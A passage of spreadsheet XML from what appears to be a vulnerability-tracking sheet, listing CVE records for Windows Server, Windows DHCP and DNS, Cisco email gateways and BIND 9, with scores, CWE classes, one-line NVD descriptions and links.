          <t>NVD</t>
        </is>
      </c>
      <c r="O614" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P614" s="5" t="inlineStr"/>
      <c r="Q614" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R614" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Virtual Trusted Platform Module allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S614" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69890</t>
        </is>
      </c>
    </row>
    <row r="615">
      <c r="A615" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B615" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C615" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71330</t>
        </is>
      </c>
      <c r="D615" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E615" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F615" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G615" s="5" t="inlineStr"/>
      <c r="H615" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I615" s="5" t="inlineStr"/>
      <c r="J615" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K615"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615" s="5" t="inlineStr"/>
      <c r="M615" s="5" t="inlineStr"/>
      <c r="N615" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O615" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P615" s="5" t="inlineStr"/>
      <c r="Q615" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="R615" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive system information to an unauthorized control sphere in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S615" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71330</t>
        </is>
      </c>
    </row>
    <row r="616">
      <c r="A616" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B616" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C616" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72928</t>
        </is>
      </c>
      <c r="D616" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E616" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F616" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G616" s="5" t="inlineStr"/>
      <c r="H616" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I616" s="5" t="inlineStr"/>
      <c r="J616" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K616" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L616" s="5" t="inlineStr"/>
      <c r="M616" s="5" t="inlineStr"/>
      <c r="N616" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O616" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P616" s="5" t="inlineStr"/>
      <c r="Q616" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R616" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S616" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72928</t>
        </is>
      </c>
    </row>
    <row r="617">
      <c r="A617" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B617" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C617" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76163</t>
        </is>
      </c>
      <c r="D617" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E617" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F617" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G617" s="5" t="inlineStr"/>
      <c r="H617" s="5" t="inlineStr"/>
      <c r="I617" s="5" t="inlineStr"/>
      <c r="J617" s="5" t="inlineStr"/>
      <c r="K617" s="5" t="inlineStr"/>
      <c r="L617" s="5" t="inlineStr"/>
      <c r="M617" s="5" t="inlineStr"/>
      <c r="N617" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O617" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P617" s="5" t="inlineStr"/>
      <c r="Q617" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="R617" s="5" t="inlineStr">
        <is>
          <t>If BIND is loaded with a "`named.conf`" file that contains no global "`options`" block, an attacker can send a query of QTYPE TKEY which may cause an assertion failure and subsequent unexpected program exit.
This issue affects BIND 9 versions 9.20.0 through 9.20.27, 9.21.0 through 9.21.25, and 9.20.9-S1 through 9.20.27-S1.</t>
        </is>
      </c>
      <c r="S617" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76163</t>
        </is>
      </c>
    </row>
    <row r="618">
      <c r="A618" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B618" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C618" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76442</t>
        </is>
      </c>
      <c r="D618" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E618" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F618" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G618" s="5" t="inlineStr"/>
      <c r="H618" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I618" s="5" t="inlineStr"/>
      <c r="J618" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K618" s="5" t="inlineStr"/>
      <c r="L618" s="5" t="inlineStr"/>
      <c r="M618" s="5" t="inlineStr"/>
      <c r="N618" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O618" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P618" s="5" t="inlineStr"/>
      <c r="Q618" s="5" t="inlineStr">
        <is>
          <t>CWE-1284</t>
        </is>
      </c>
      <c r="R618" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Secure Email Gateway and Cisco Secure Email and Web Manager engineering team has conducted a comprehensive internal security review. This review resulted in software hardening releases that address multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-76442 are related to issues with improper validation of specified quantity in input that are grouped under the Common Weakness Enumeration (CWE) Pillar CWE-1284.</t>
        </is>
      </c>
      <c r="S618" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76442</t>
        </is>
      </c>
    </row>
    <row r="619">
      <c r="A619" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B619" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C619" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77494</t>
        </is>
      </c>
      <c r="D619" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E619" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F619" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G619" s="5" t="inlineStr"/>
      <c r="H619" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I619" s="5" t="inlineStr"/>
      <c r="J619" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K619" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L619" s="5" t="inlineStr"/>
      <c r="M619" s="5" t="inlineStr"/>
      <c r="N619" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O619" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P619" s="5" t="inlineStr"/>
      <c r="Q619" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R619" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S619" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77494</t>
        </is>
      </c>
    </row>
    <row r="620">
      <c r="A620" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B620" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C620" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77498</t>
        </is>
      </c>
      <c r="D620" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E620" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F620" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G620" s="5" t="inlineStr"/>
      <c r="H620" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I620" s="5" t="inlineStr"/>
      <c r="J620" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K620" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L620" s="5" t="inlineStr"/>
      <c r="M620" s="5" t="inlineStr"/>
      <c r="N620" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O620" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P620" s="5" t="inlineStr"/>
      <c r="Q620" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R620" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S620" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77498</t>
        </is>
      </c>
    </row>
    <row r="621">
      <c r="A621" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B621" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C621" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77499</t>
        </is>
      </c>
      <c r="D621" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E621" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F621" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G621" s="5" t="inlineStr"/>
      <c r="H621" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I621" s="5" t="inlineStr"/>
      <c r="J621" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K621" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L621" s="5" t="inlineStr"/>
      <c r="M621" s="5" t="inlineStr"/>
      <c r="N621" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O621" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P621" s="5" t="inlineStr"/>
      <c r="Q621" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R621" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S621" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77499</t>
        </is>
      </c>
    </row>
    <row r="622">
      <c r="A622" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B622" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C622" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77501</t>
        </is>
      </c>
      <c r="D622" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E622" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F622" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G622" s="5" t="inlineStr"/>
      <c r="H622" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I622" s="5" t="inlineStr"/>
      <c r="J622" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K622" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L622" s="5" t="inlineStr"/>
      <c r="M622" s="5" t="inlineStr"/>
      <c r="N622" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O622" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P622" s="5" t="inlineStr"/>
      <c r="Q622" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R622" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S622" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77501</t>
        </is>
      </c>
    </row>
    <row r="623">
      <c r="A623" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B623" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C623" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77502</t>
        </is>
      </c>
      <c r="D623" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E623" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F623" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G623" s="5" t="inlineStr"/>
      <c r="H623" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I623" s="5" t="inlineStr"/>
      <c r="J623" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K623" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L623" s="5" t="inlineStr"/>
      <c r="M623" s="5" t="inlineStr"/>
      <c r="N623" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O623" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P623" s="5" t="inlineStr"/>
      <c r="Q623" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R623" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S623" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77502</t>
        </is>
      </c>
    </row>
    <row r="624">
      <c r="A624" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B624" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C624" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77692</t>
        </is>
      </c>
      <c r="D624" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E624" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F624" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G624" s="5" t="inlineStr"/>
      <c r="H624" s="5" t="inlineStr"/>
      <c r="I624" s="5" t="inlineStr"/>
      <c r="J624" s="5" t="inlineStr"/>
      <c r="K624" s="5" t="inlineStr"/>
      <c r="L624" s="5" t="inlineStr"/>
      <c r="M624" s="5" t="inlineStr"/>
      <c r="N624" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O624" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P624" s="5" t="inlineStr"/>
      <c r="Q624" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R624" s="5" t="inlineStr">
        <is>
          <t>An attacker can cause `named` to abort by sending a crafted DNS-over-HTTPS request with a cryptographically invalid SIG(0) record, and then closing the transport connection prematurely.
This issue affects BIND 9 versions 9.20.0 through 9.20.27, 9.21.0 through 9.21.25, and 9.20.9-S1 through 9.20.27-S1.</t>
        </is>
      </c>
      <c r="S624" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77692</t>
        </is>
      </c>
    </row>
    <row r="625">
      <c r="A625" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B625" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C625" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77886</t>
        </is>
      </c>
      <c r="D625" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E625" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F625" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G625" s="5" t="inlineStr"/>
      <c r="H625" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I625" s="5" t="inlineStr"/>
      <c r="J625" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K625" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L625" s="5" t="inlineStr"/>
      <c r="M625" s="5" t="inlineStr"/>
      <c r="N625" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O625" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P625" s="5" t="inlineStr"/>
      <c r="Q625" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R625" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S625" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77886</t>
        </is>
      </c>
    </row>
    <row r="626">
      <c r="A626" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B626" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C626" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77888</t>
        </is>
      </c>
      <c r="D626" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E626" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F626" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G626" s="5" t="inlineStr"/>
      <c r="H626" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I626" s="5" t="inlineStr"/>
      <c r="J626" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K626" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L626" s="5" t="inlineStr"/>
      <c r="M626" s="5" t="inlineStr"/>
      <c r="N626" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O626" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P626" s="5" t="inlineStr"/>
      <c r="Q626" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R626" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S626" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77888</t>
        </is>
      </c>
    </row>
    <row r="627">
      <c r="A627" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B627" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C627" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77889</t>
        </is>
      </c>
      <c r="D627" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E627" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F627" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G627" s="5" t="inlineStr"/>
      <c r="H627" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I627" s="5" t="inlineStr"/>
      <c r="J627" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K627" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L627" s="5" t="inlineStr"/>
      <c r="M627" s="5" t="inlineStr"/>
      <c r="N627" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O627" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P627" s="5" t="inlineStr"/>
      <c r="Q627" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R627" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S627" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77889</t>
        </is>
      </c>
    </row>
    <row r="628">
      <c r="A628" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B628" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C628" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77890</t>
        </is>
      </c>
      <c r="D628" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E628" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F628" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G628" s="5" t="inlineStr"/>
      <c r="H628" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I628" s="5" t="inlineStr"/>
      <c r="J628" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K628" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L628" s="5" t="inlineStr"/>
      <c r="M628" s="5" t="inlineStr"/>
      <c r="N628" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O628" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P628" s="5" t="inlineStr"/>
      <c r="Q628" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R628" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S628" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77890</t>
        </is>
      </c>
    </row>
    <row r="629">
      <c r="A629" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B629" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C629" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77893</t>
        </is>
      </c>
      <c r="D629" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E629" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F629" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G629" s="5" t="inlineStr"/>
      <c r="H629" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I629" s="5" t="inlineStr"/>
      <c r="J629" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K629" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L629" s="5" t="inlineStr"/>
      <c r="M629" s="5" t="inlineStr"/>
      <c r="N629" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O629" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P629" s="5" t="inlineStr"/>
      <c r="Q629" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R629" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S629" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77893</t>
        </is>
      </c>
    </row>
    <row r="630">
      <c r="A630" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B630" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C630" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77895</t>
        </is>
      </c>
      <c r="D630" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E630" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F630" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G630" s="5" t="inlineStr"/>
      <c r="H630" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I630" s="5" t="inlineStr"/>
      <c r="J630" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K630" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L630" s="5" t="inlineStr"/>
      <c r="M630" s="5" t="inlineStr"/>
      <c r="N630" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O630" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P630" s="5" t="inlineStr"/>
      <c r="Q630" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R630" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S630" s="6" t="inlineStr">
        <is>
